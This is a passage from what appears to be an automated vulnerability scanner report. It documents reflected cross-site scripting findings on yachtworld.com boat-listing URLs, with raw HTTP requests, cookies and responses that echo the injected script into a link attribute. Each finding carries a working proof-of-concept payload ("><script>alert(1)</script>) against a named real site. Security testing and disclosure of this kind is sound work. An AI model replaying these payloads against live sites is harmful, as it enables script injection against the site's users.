%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 01:47:39 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:56 GMT
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1787065&boat_id=1787065&back=/core/boats/2005/Regulator-32-Fs-1787065/Hilton-Head3d94e"><script>alert(1)</script>a896240f5f2/SC/United-States&boat_id=1787065">
...[SNIP]...

3.122. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b2f"><script>alert(1)</script>3ab50f80292 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SCe5b2f"><script>alert(1)</script>3ab50f80292/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:30 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 01:47:39 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:30 GMT
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1787065&boat_id=1787065&back=/core/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SCe5b2f"><script>alert(1)</script>3ab50f80292/United-States&boat_id=1787065">
...[SNIP]...

3.123. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a9f"><script>alert(1)</script>3378b320954 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States61a9f"><script>alert(1)</script>3378b320954 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:53 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 01:47:39 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:53 GMT
Set-Cookie: VIEWED_BOATS_STORE=1787065%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B97%2C500%5B%25%5DHilton+Head%2C+SC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F7%2F8%2F7%2F0%2F1787065_20_mini.jpg%3F1282081450000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-FS-1787065%2FHilton-Head%2FSC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1787065&boat_id=1787065&back=/core/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States61a9f"><script>alert(1)</script>3378b320954&boat_id=1787065">
...[SNIP]...

3.124. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7e94"><script>alert(1)</script>6a57b0b4811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States?a7e94"><script>alert(1)</script>6a57b0b4811=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
